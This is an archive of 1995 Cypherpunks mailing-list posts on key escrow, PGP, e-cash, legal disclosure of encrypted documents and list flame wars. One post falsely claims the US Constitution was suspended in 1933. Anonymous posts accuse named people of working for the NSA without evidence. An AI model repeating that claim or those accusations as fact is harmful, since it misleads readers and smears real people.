     Skip


______________________________ Reply Separator _________________________________
Subject: Re: [NOISE/Fun] some 'special' primes
Author:  Michael <mike@uac.net> at internet
Date:    09-09-95 00:34


> A bit more fun : German : 811 (dunno how to write it, but it starts 
> with an "a")
     
acht hundert uenf  (I think)
     
     
--Michael





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Sat, 9 Sep 95 12:37:44 PDT
To: pfarrell@gmu.edu
Subject: DC-area Meeting Sept 16
Message-ID: <56183.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The next DC-area cypherpunks meeting will be next Saturday afternoon
at Digex's headquarters in suburban Maryland.  Please mark
your calendars.

Directions, maps, and exact time will be published soon.

Doug Humphrey says that the office is less than one mile from
public transportation. Carpools worked for the last meeting,
so I expect rides from Northern Virginia and even Baltimore can
be arrainged.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sharborth@hai-net.com
Date: Sat, 9 Sep 95 12:31:10 PDT
To: Michael <mike@uac.net>
Subject: Re[4]: [NOISE/Fun] some 'special' primes
Message-ID: <9508098106.AA810686811@houston_cc_smtp.hai-net.com>
MIME-Version: 1.0
Content-Type: text/plain


     yah


|>     ocht hundert elf
|
|How about a compromise...
|
|      acht hundert elf
|
|
|--Michael





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sameer R Manek <seawolf@challenger.atc.fhda.edu>
Date: Sat, 9 Sep 95 22:18:38 PDT
To: Pat Farrell <pfarrell@netcom.com>
Subject: Re: Sigh Re: not a flame please read and think about this
In-Reply-To: <53877.pfarrell@netcom.com>
Message-ID: <Pine.SGI.3.90.950909154927.22329A-100000@challenger.atc.fhda.edu>
MIME-Version: 1.0
Content-Type: text/plain


I think we can end this childish flaming. I hope both Pat and na116512
are mature enough enough not to respond to this post and if they
want to make sure they keep the mailing list out of this.

If you both want to flame each other take it to private email and 
flame away.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cme@acm.org
Date: Sat, 9 Sep 95 13:22:53 PDT
To: cman@communities.com
Subject: Re: GAK
In-Reply-To: <v02120d22ac76a26200fa@[199.2.22.120]>
Message-ID: <9509092013.AA02155@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Fri, 8 Sep 1995 17:58:57 -0800
>From: cman@communities.com (Douglas Barnes)
>
>
>>
>>If too much attractive stuff is available by loss of any one public key,
>>that key gets attacked.  To compensate for this, the TIS DRC generates new
>>public keys periodically to give out to new (or old) customers.
>>
>>However, a government warrant which demands the DRC's private key collection
>>would gain quite a harvest.
>
>The economics of the situation seem to dictate that whether you have
>one key or N keys, it's going to be cheaper to subvert the escrow agent
>(you guys or whoever) than it is to brute-force even one key. 

You're right, of course.  That's why I, personally, would trust my key
backup only to (k of n) TIS DRCs in Earth orbit or farther out.

>You may feel very comfortable with the personnel and procedures you
>have in place now, ....

People keep assuming that TIS will run a commercial DRC.  We do not plan
to.  We did the design and will sell DRC hardware and security consulting
(physical, policy, ...) to companies wanting to set up their own for
internal use.  That's the only mass DRC market we envision.  This could
change, but that's the current plan.

Meanwhile, the real question is GAK -- whether the DRC you choose to use
goes along with it or not.  You might check my home page for my views on
GAK.  It is possible to have a Corporation running a DRC which refuses to
play along with GAK.  They won't be blessed for attachment to exportable
crypto, most likely, but it's entirely possible for this to exist.  Tim May
may run one, for example.  (I'd still want it to be in orbit.)

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme/home.html  |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+----------------------------------------------------------- Jean Ellison -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an116512@anon.penet.fi
Date: Sat, 9 Sep 95 10:09:11 PDT
To: cypherpunks@toad.com
Subject: Re: not a flame please read and think about this
Message-ID: <9509091640.AA15487@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


to make my point: why is pat farrel helping the nsa and nist make
better key escrow?

i quote mr farrel:

	We reworded #5 to say "want to Trust the Product." This means that it 
	is untampered, works as expected, etc. We then hashed out ways to 
	know this. The list ended up looking like:
	1. is available only as object code
	2. contains some "hash" function to check for modifications
	3. contains some unique hash, with uniqueness based upon something 
		like "site," "per copy" or "per release" 
	4. Contains policies against modification, such as liscense language 
		against decompilation.
	5. OS-related security, such as runs "protected mode" instead of as a 
		wild DOS program.

and

	We then developed "goals" including:
	1. One version for sale worldwide
	2. Allow development in the US
	3. Domestic Law Enforcement Agencies want Escrowed (I almost wrote GAK :-)
	4. Must interoperate with everything
	5. Receiver can only decrypt if escrow agencies can decrypt.

hey why not just write the escorw code for them!!!???

is mr farrel just being naive or is does he realize who hes working for?

sorry to single him out but this is just an example of what im talking about.

he is not the only example by far.

think people!!!!!
----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MMac102754@aol.com
Date: Sat, 9 Sep 95 14:05:01 PDT
To: cypherpunks@toad.com
Subject: Re: Sigh Re: not a flame please read and think about this
Message-ID: <950909170449_15035342@mail04.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Mr anon,

if you want to flame, sign your name.

M MacLeish = MMac102754@aol.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alano@teleport.com (Alano@teleport.com)
Date: Wed, 20 Sep 95 17:16:55 PDT
To: cypherpunks@toad.com
Subject: RE: CRYPTOGRAPHY ELIMINATES LAWYERS?
Message-ID: <9509201549496270@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Sat, 09 Sep 1995 12:41:12 -0700
To: cypherpunks@toad.com
From: Alan Olsen <alano@teleport.com>
Subject: Re: cryptography eliminates lawyers?

At 02:44 PM 9/8/95 -0400, you wrote:
>We wish!  We really wish!

"Fill that lawyer with a few more slugs of encryption!"

The argument that encryption will free us from all the legal ills of the
world is pretty specious.  If anything it will make more work for lawyers as
the non-clue-endowed portion of the world tries to come to terms with the
new technology.  They will make rules and subsets of rules and exeptions to
rules and variations to interpetations of rules that will make the current
set look like the rules to "chutes and ladders".  Part of the job of the
lawyer class is to guarentee the existance of work for other lawyers (as
well as themselves).  It does not depend on what the medium of exchange is.
Lawyers and government forces will try and figure out some way to try and
extract it from you.

The government is trying very hard to keep any scrap of power from creeping
away from them.  You can bet that they will try every thing they can think
of, rational and irrational, to regulate and control the wilds of
cyberspace.  They will pump up every imaginary boogieman to help them get
the public to swallow what they are fed.  By the time they figure out they
have been had, it will be too late.  Cypherpunks must be the syrup of ipecac
to the governments dose of poison to the body politic!  (I need to start
drinking more coffee in the morning.  I cannot believe I wrote that...)

Unfortunatly the public does not thrive on logic.  They had been trained to
react emotionally to things and not react logically.  I am not certain what
can be used to get them to realize why they need encryption.  Dispelling the
bogeymen is none need. The other thing is that the tools need to be made as
simple as possible.  The current tools for use require a fair bit of
technical understanding.  Until they have an integrated front-end that makes
it about as easy to use as America On-Line, encryption will not gain
widespread usage.  This is the type of code that needs to be written.
Making integrated tools like newsreaders and mail programs that support
strong encryption directly is what is needed for widespread use.  (As well
as being usable programs in and of themselves.  Many of the programs for
news and mail are crap.)  Making cryptography a "cool and fun thing to use"
will help dispell many of the myths and may help to defuse the government
created bogey men.  (Of course they will claim that it aids "criminals and
terrorists", but to them EVERYONE is a criminal and a terrorist.)  
|             Visualize whirled keys              | alano@teleport.com   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - Black Art | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dar Scott)
Date: Sat, 9 Sep 95 22:13:50 PDT
To: cypherpunks@toad.com
Subject: Re: Scientology/Wollersheim as test case for key disclosure
Message-ID: <v01510100ac77f0effd65@[198.59.115.132]>
MIME-Version: 1.0
Content-Type: text/plain


Phill <hallam@w3.org> wrote,
>One solution to this problem would be to modify PGP so that the session
>key for
>the document was released rather than the passphrase for the public key. The
>former would provide only read access, the latter would allow th
>scientologists
>to forge Wollerstein's signature on other material. In addition many of the
>documents may be subject to privillege.

It seems to me that if this kind of risk was seen ahead of time that a
method doing the equivalent using ordinary PGP commands could be agreed
upon by all involved.  The document could be encrypted using "PGP
conventional encryption" and the pass phrase for that could then encrypted
using the public key.  The encrypted document would thus consist of these
two parts.  The breaking of the traditional decryption into it's two parts
would not be needed--superficial use of PGP would work.

The owner of the public key--who is in possession of the document encrypted
as suggested--when threated by an attacker--who is also in possession of
the document--with an unbearably high cost for not giving up his secret key
can offer to give up the the password for the "PGP conventional
encryption".

This method does not define how the password is obtained and that might be
a weakness.

I confess I'm new to PGP (and this subject in general) and am ignoring the
suggestion in Tim May's FAQ that newbies try not to look clueless.

Dar Scott


===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 9 Sep 95 22:15:47 PDT
To: cypherpunks@toad.com
Subject: RSA licensing costs?
Message-ID: <199509100038.UAA06872@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


	Does anyone know how much RSA wants per desktop in a large
client application?  Using the BSAFE dereived licenses would be fine
for this.  (We're looking at 2-10k licenses for a nameless financial
institution, doing those things that RSA likes. :)

Adam

--
"It is seldom that liberty of any kind is lost all at once."
						-- Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: uSuRa <usura@utopia.hacktic.nl>
Date: Sat, 9 Sep 95 12:20:17 PDT
To: cypherpunks@toad.com
Subject: WoT keyring (fwd)
Message-ID: <199509091919.VAA00549@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text


Forwarded message:

> From: don@stat8.byu.edu (Donald M. Kitchen)
>  
> Due to problems distributing my Web of Trust keyring from my own site,
> I have uploaded a .gz version. Please announce it to cpunks as soon
> as you have changed the permissions.
>  
> Thanks
> Don


 This file is available from:

	ftp.hacktic.nl/pub/pgp/pgp-key-ring/donring.pgp.gz

 944 -rw-r--r--   1 pub  pub  955577 Sep  8 18:37 donring.pgp.gz


 EnJoY !
  -AJ-



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: uSuRa <usura@utopia.hacktic.nl>
Date: Sat, 9 Sep 95 12:24:38 PDT
To: don@stat8.byu.edu (Donald M. Kitchen)
Subject: Re: WoT keyring
In-Reply-To: <9409091627.AA05472@stat8.byu.edu>
Message-ID: <199509091923.VAA00663@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text


From Donald M. Kitchen:

>  
> Due to problems distributing my Web of Trust keyring from my own site,
> I have uploaded a .gz version. Please announce it to cpunks as soon
> as you have changed the permissions.
>  
> Thanks
>  
> Don
> 


	It's available from:	

	ftp.hacktic.nl/pub/pgp/pgp-key-ring

total 946
   1 drwxr-xr-x  2 pub  pub     512 Sep  9 21:15 ./
   1 drwxr-xr-x  4 pub  pub     512 Sep  9 21:14 ../
 944 -rw-r--r--  1 pub  pub  955577 Sep  9 21:15 donring.pgp.gz
     


	Regards,
	 -AJ-



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Sat, 9 Sep 95 22:11:02 PDT
To: cypherpunks@toad.com
Subject: Bizdos citizenship?
Message-ID: <199509100434.VAA10595@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


In correspondence with someone outside the US regarding ITAR regulations, the remark was made that Jim Bizdos was Greek and not a U.S. citizen.  Is this statement in the same class as an Elvis sighting?  Or if it is true, what impact would ITAR have on foreign nationals working for a US company involved with export restricted crypto?

Please don't get carried away and turn this into a Net rumor.  I'm just curious if anyone on the list can confirm or deny the citizenship comment.

Joel McNamara
joelm@eskimo.com - http://www.eskimo.com/~joelm for PGP key
Thomas Jefferson used strong crypto, shouldn't you?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: starrd <starrd@iia2.org>
Date: Sat, 9 Sep 95 22:39:24 PDT
To: Joel McNamara <joelm@eskimo.com>
Subject: Re: Bizdos citizenship?
In-Reply-To: <199509100434.VAA10595@mail.eskimo.com>
Message-ID: <Pine.BSD.3.91.950909223404.26464A-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 9 Sep 1995, Joel McNamara wrote:

> Date: Sat, 09 Sep 1995 21:34:11 -0700
> From: Joel McNamara <joelm@eskimo.com>
> To: cypherpunks@toad.com
> Subject: Bizdos citizenship?
> 
> In correspondence with someone outside the US regarding ITAR regulations, the remark was made that Jim Bizdos was Greek and not a U.S. citizen.  Is this statement in the same class as an Elvis sighting?  Or if it is true, what impact would ITAR have on foreign nationals working for a US company involved with export restricted crypto?
> 
> Please don't get carried away and turn this into a Net rumor.  I'm just curious if anyone on the list can confirm or deny the citizenship comment.
> 
> Joel McNamara
> joelm@eskimo.com - http://www.eskimo.com/~joelm for PGP key
> Thomas Jefferson used strong crypto, shouldn't you?
> 


You should consciously be aware that the U.S. Government *will* break 
it's own laws to further it's goals.  You should know that such as law as 
"this shall be the law unless the fuhrher disagrees andf then what the 
furhrer says shall be the new law"  [yes, such a law was in Nazi 
Germany's lawbooks]  in the states we call it "Executive Order" and with 
the U.S. beiong one of the most powerful outlaw governments on this 
planet, you should watch them anyway.  Dont count on your citizenship or 
location outside of the US as protecting you.   If they want you, you are 
dead-meat.  You know it too!


BTW, if you are going to say 'well the US has a Constitutioon, we'll we 
*dont* it was suspended in 1933...
||||||||||||email address: starrd@iia2.org or starrd@cinenet.net|||||||||||
|    Creator of the original                |         Get paid to upload  |
|      Patriot's Archives                    \     shareware to BBSes and |
| ftp: iia.org /pub/users/patriot              \_____      the Internet!  |
| ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\      Get file:     |
| For index of available files: descript.ion           \  uploader.zip    |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzAN3FwAAAEEAOgWK9QJo3LIPXC+C/RHE+nmlddXPthC0hgLL7oKg7WPjYgk
LrX7j0eUmb5e6t2sm/PkJ1wjk839fqjUmRPLD0mhPX6KsMB0DoecYbCKLrNUY1gP
7DZijj9e7fuPaHqhuY7K5rGjN4po4ZxGhEPQv32IjQLSza9nbU05aMuMG71tAAUR
tB9EYXZpZCBXIFN0YXJyIDxzdGFycmRAaWlhMi5vcmc+iQCVAwUQMCnJQEY2REVK
Mit9AQG9AAQAps4lKzeQ/OQyXbvxG4b5wWsvHEK/K+1L/tfG0+EmlEsDARaN2pBD
cCslIKHjBa8al2BaTSsNjCUSHMgd+IWRp+nw2XJt/lRqpvTN5m7pPNAEQbSgCGwf
9kJ1IDPMokOw9XXAuGAqMQi9HogepNxp7JOdNphcJulHf9XbyCy/sig=
=0Tlq
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scs@lokkur.dexter.mi.us (Steve Simmons)
Date: Sat, 9 Sep 95 22:22:21 PDT
Subject: Re: Sigh Re: not a flame please read and think about this
In-Reply-To: <199509092006.NAA05181@jobe.shell.portal.com>
Message-ID: <1995Sep9.230847.16371@lokkur.dexter.mi.us>
MIME-Version: 1.0
Content-Type: text/plain


anonymous-remailer@shell.portal.com writes:

>Then shut up.
 [[ drivel excised ]]
>Then shut up.

Please do us the favor of using a killfile-able name in the future.
-- 
  "Captain Kirk and I both want the same thing: the whole-hearted devotion
of a naive alien.   And if certain things stand in our way -- Klingons for
Kirk, reality for me -- well, we just have to suck in our guts, set the
phasers on Stun, and hope for the best."    Ian Schoales (Merle Kessler)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Sat, 9 Sep 95 22:11:18 PDT
To: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Subject: Re: Scientology/Wollersheim as test case for key disclosure
In-Reply-To: <Pine.PMDF.3.91.950909100445.541100226A-100000@umiami.ir.miami.edu>
Message-ID: <Pine.SOL.3.91.950909231834.10116D-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain


For some reason I think it was French, but I don't
have a citation either.  But I think you're right.

MacN

On Sat, 9 Sep 1995, Michael Froomkin wrote:

> Ah.  but if there is no plaintext, the question is whether you comply 
> with the rule by providing the encrypted text rather than plaintext.  I 
> would say you have to provide the plaintext in the absence of a legitimate 
> privilege claim, but I don't recall a case to this effect (there is 
> precedent for requiring translation of foreign language documents when 
> the request is covered by an evidence conention; I don't recall if there 
> are any such cases that fall purely under domestic US rules).  Anyone have 
> chapter and verse?
> 
> 
> A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
> Associate Professor of Law | mfroomki@umiami.ir.miami.edu
> U. Miami School of Law     | 
> P.O. Box 248087            | It's hot here.  And humid.
> Coral Gables, FL 33124 USA |
> See (soon to move to its real home): http://www.law.miami.edu/~mfroomki
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Sun, 10 Sep 95 00:07:21 PDT
To: cypherpunks@toad.com
Subject: Re: Internet commerce mtg, Denver
Message-ID: <199509100705.AA22815@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

L. Detweiler's tentacle Vlad Nuri writes:

> [...]
> the rep told me something interesting: he said that every
> Bell phone book is actually "seeded" with dummy names
> so they can detect copyright infringers. if you come out
> with a business directory, these Bells will just scan for
> the fake names that they have inserted into their own listings.
> if they find them, supposedly they can show them to a copyright
> judge and he will immediately close down your operation and
> fine you, almost no questions asked. I didn't know how much
> of this really happens (the legal stuff sounded questionable
> to me) but it is an interesting "real world" instance of
> copyright terrorism prevention that the "information liberation
> front" would have to contend with. 

While he's correct that publishers of data compilations do use
dummy entries to track [mis]use of their data, he's incorrect when
he asserts that it's possible to get a copyright on an ordinary
white-pages style directory. (_Feist v. Rural Telephone_, 499 US 340
(1991), http://www.law.cornell.edu/supct/classics/499_340v.htm ).
This practice occurs when mailing lists are sold, and in the 
drafting of maps (non-existent streets or sections of streets may
be added, or changed in an unremarkable way). 

It's also possible (and getting easier with laser printers, etc) to
generate apparently indentical but distinguishable documents for
use where disclosure of the documents is controlled; the distinguishing
parts (perhaps a misspelled word or other apparent typo, or a change
in line spacing between paragraphs, or altered line breaks) can then
be used to trace a recovered "leaked" document to the person who
received it originally. Where the documents are digital (or
digitizable), two or recipients could collude to 'diff' their 
copies, and find the barium data; but a savvy document-distributor
could generate copies with multiple ID-bits, such that any two copies
might have differences between the two, but barium data that's the
same yet different from the other participants. So those two 
colluders round up a third recipient [...] It's basically a form of
very-low-bandwidth text-only steganography.  

Of course, we're wandering into FAQ territory; isn't there something
in the Cyphernomicon about digital signatures for physical items 
being used as proof of source? (e.g., you'll know that the expensive
motorcycle part you just bought really *is* from Harley-Davidson,
not a cheaper part placed in a knockoff Harley box) 
 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFIOtX3YhjZY3fMNAQGlwAP+KhhBK1MGDvsNizH5Pu7XsqQg6rPxnCp2
q5YRZrQyVktit8hK+TbHcodAvG7IWK2vFuI1y80dFx5sKfAqjLU81rth7Pad7nRm
USUYUIxlvnaO7dOWUPMsEaaad2uZpLn/ALoTwXsYqzT2YjPyl1/YYLTHkmK/PHUI
5C6yJNKtpAY=
=CwZF
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ethan Lindsey <karlmarx@ix.netcom.com>
Date: Mon, 11 Sep 95 00:43:04 PDT
To: cypherpunks@toad.com
Subject: Voice Encryption
Message-ID: <199509110742.AAA17689@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


 A friend of mine recently told me that Phil Zimmerman was distributing a voice
encryption program over the 'net. I dismissed his comment thinking he was probably 
just confused and thinking about PGP. Lately though, I've been wondering if he was 
right. Does anyone know of any voice cryptology program that encrypts voice throught 
a modem connection? Thanx...

ethan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Sat, 9 Sep 95 22:31:29 PDT
To: list ecash <e-cash@nptn.org>
Subject: Brand e-cash implementation?
Message-ID: <Pine.PMDF.3.91.950910012952.541131339B-100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Have there been any implementations, even as trials, of Brands' protocols?
Do any ecash systems on the drawing board even include real user anonymity?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See (soon to move to its real home): http://www.law.miami.edu/~mfroomki





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Sat, 9 Sep 95 22:33:22 PDT
To: list ecash <cypherpunks@toad.com>
Subject: Dishonest banks & ecash
Message-ID: <Pine.PMDF.3.91.950910013128.541131339C-100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


I've been doing some ecash reading.  The threat model is the dishonest 
user or 3rd party who tries to mint the stuff.  Any work been done on the 
problem of the dishonest bank (a la Bcci) that tries to mint the stuff?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See (soon to move to its real home): http://www.law.miami.edu/~mfroomki





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 10 Sep 95 02:10:05 PDT
To: cypherpunks@toad.com
Subject: PGP in UK
Message-ID: <199509100908.CAA23542@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I heard something rather disturbing the other day from someone I do
business with.  I've been telling this company for 18 months or so
about the advantages of PGP and email rather than faxes, and they
finally tried it, liked it, and decided to use it a month or so ago.
Last week they got a visit from the Department of Trade of Industry
and MI5 (or is it MI6?) telling them to stop using PGP or they might
find difficulties getting export licences for their products in
future.  The visitors wouldn't say how they knew this company had
been using it.
The person who told me about this also said something about a
Department of Trade & Industry paper which mentioned that the British
Government was going to insist on key escrow for encryption.  I had
hoped to get a copy of this, but he can't find it at the moment.
I'll post the text when I get it if anyone's interested.

Anyone else in the UK heard anything about this?

- -- B.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.i

iQEVAgUBMFGPfeHVHXeXphJJAQFJ0Af/Svh0ifULgpEuauSBPFreDDJoa/a1gcPe
ya3CjOde9kVuN0IkBHFubO18MrAO6WbwlhVa/X/pjG4vbSahonpzmgHHfkVW20Gh
qlhBwFLElTmOgspSjHJ74sYNUM2YZ+AKOyNwW4ix6woJ0WL0NP+cV8CZv4tdEH4l
EI3/FuoFccbkKMk7QYoRPOyj5FI4GiFxVsg1GFOU3r83bxfJDfU2yZdImEBx/Nlc
gteizqFTF/QiKckl6f5NzCBzaoIcMw0VLN8dAGLqzDycJtFqGdOPgvgSt1LwXKBs
+zJM5Z/laubYm5SiEPy4oVz9N3lT4EOzEtdMEoiSC6IiSDSaURkEAA==
=GiY0
-----END PGP SIGNATURE-----


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.i

mQENAi8KzVoAAAEH/2gPfD2Xdw1nDAXtMH/F5iCMrwdXHXolEfOjRP59QP1Yodhb
L+NGSNls67+H1us5PP5EpHDbHRy66ExgRK7XdZ/2qz0SsbTG+R6pRIILmMfgd3Nj
M6uq1DehdxWPdp4PMC9LNrG2V9QrRGPgpHhr3iDfy+p6JTjW8XCYUXn5POt0wBs2
n/vlowjLf9dVYwUKP58V9gokNsFlGcB08gEbxKa9Y2X7zB3BAlywPVdKVh+BOTCK
z1Sofx9Wup0MEXEDEESLDSq/634hzzVx6Kt54cZBbi5nAdPHWlGHZl5vU93A3jPE
fh59JXsCZmWKLXMjZtjcIJYkC4hC4dUdd5emEkkABRG0DEIuIERlIExhIFBheokB
FQIFEC8g7yzh1R13l6YSSQEBD+4H/ir8R4iw1tWLUuxz6etmV99OhMUYoI5lQnxz
9KARQf4eD3xHPoMw6tHLKOUR8xYS9i2RmkhJrPRzCfD5OKSOBEHuIQEt/+dcbCuw
0fxn9NrU7NjFWwWKQ+0jYikN3hfIWcPmGtyhQ0KSrGfUDo5+rJr5Cy4U6eOooepv
gYniecNNVAzQ2KDiWTOZ5zqG3zBAYj6uw8LHvBR1qol2YcJ4s02c4GdAZmzEq49s
nDBortKfWUAxZkESBt2tMx8gYq6b38evYJBLXOqEN5Lt/5zf0nG1u0BEWBLaCj55
y8lh1KolVOu808tX9blOrjqwEB12vngjXzf7hHWohrGrrQVT2N4=
=5qEt
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Sat, 9 Sep 95 22:13:09 PDT
To: cypherpunks@toad.com
Subject: Re: not a flame please read and think about this
Message-ID: <199509100245.EAA09943@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



i know this is unpopular but i wish someone would respond the the points
rather than flaming me. pat farrel is the only one of you with the balz
to try to defend himself insead of attacking me. and you attack me for
being anon. i love it. cypherpunks yea right.

more of the indefensible. ive been keeping a list:

janet renos cypherpunk heros:

wei dai patents algorithms - for microsoft!!!!. that should
fucking help us a lot. whos he gonna sue first?

hey i think ill patent xor!!!! and give the patent to the nsa!!!

according to sci.crypt mat blaze can prove that clipper has no back
door. right. that sure helps us. david sternlights new hero.

pat farrel signs up with the nsa to make the key escrow rules easier
for us morons to understand. hey thanks. maybe theyll give you a
nicer room in the concentration kamp.

a whole shitload of socalled cypherpunks jumping over each other to help and
defend him.

brian davis trys to convinice us that key escrow isnt so bad (who signs your paycheck davie?????)

that guy from rand corp tells us words of wisdom from robert morris the nsa guy
as if we should write them down and pray three times a day to them.

carl elison designs key escrow for tis and acts like hes one of us.

bruce schneier is copyrighting crypt programs and
threatining to sue people who use it.

even phil zimmerman is selling the rights to pgp. what about all the people who contributed code (like me). not a dime for us because phil is famous
and your not alowed to say anythingn bad about him. sorry i forgot phil is god.
no one dares to complain. ask phil about me and when i asked about sharing
profits from the code i conrtibuted. also about the deal with
r.f...

by the way i am not the anonymous-remailer@shell.portal.com person who
toold farel to shut up. that was someone else. i dont think anyone should
shut up.
thats my point. i think we should talk about this in the open.
got it perry???


lets get back to being punks. fuck these traitors. do crypto and fuck the nsa.

an116512@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alan Pugh" <Alan Pugh@MAILSRV2.PCY.MCI.NET>
Date: Sun, 10 Sep 95 01:54:29 PDT
To: cypherpunks@toad.com
Subject: Re: Certificates/Anonymity/Policy/True Names
Message-ID: <01HV3KI1816A8ZH61F@MAILSRV1.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


> What about when the CA signing key is stolen, factored, or otherwise falls  
> into the wrong hands, thereby possibly making every signature made by the CA  
> worthless, or at least questionable?
> 
> I assume liability will be based on the CA's efforts to ensure the integrity  
> of the signatures it makes (and therefore the confidentiality of the secret  
> key components), but what constitutes due diligence?  As we all know,  
> security measures cover a very wide range and can reach ridiculous  
> proportions on both ends of the spectrum...  How much security will be  
> 'enough' from a legal standpoint...?

an excellent point, and one that i'd not seriously considered until i saw 
your post. given today's legal climate, assuring the confidentiality of 
a ca's key would be pretty expensive. i suppose burning cd-roms with all 
transactions would help to document all transactions, but would not be 
definitive as far as the signatures go. any document signed with the key 
would really have to be considered valid if the signature itself is to 
really mean anything in a legal sense. if one were to allege that a 
signature is not valid, even though it checked out cryptologically, how 
could one defend against a charge that the secret key had been 
compromised. you cannot prove a negative. obviously, ianal, but i would 
think it would be reasonably easy to convince at least one jury member 
that there is a reasonable dought that the key had been compromised.

then again, it might be similar to a claim that a signature has been 
forged.

i think there could be a danger of allowing the confidence in a given 
piece of crypto to unduly influence a jury of a document's authenticity 
when the key _had_ been compromised. the 'gee wiz' factor could be fairly 
significant among juries. given statements like 'you could take all the 
computers on the planet and let them crunch on it for a billion years 
would be needed', a jury might miss issues of security.

fwiw, my 2 cents...

          *********************************************
          *          / Only God can see the whole     *
          *  O[%\%\%{<>===========================-   *
          *          \ Mandlebrot Set at Once!        *
          * amp                                       *
          * <0003701548@mcimail.com>                  *
          * <alan.pugh@internetmci.com>               *
          *********************************************
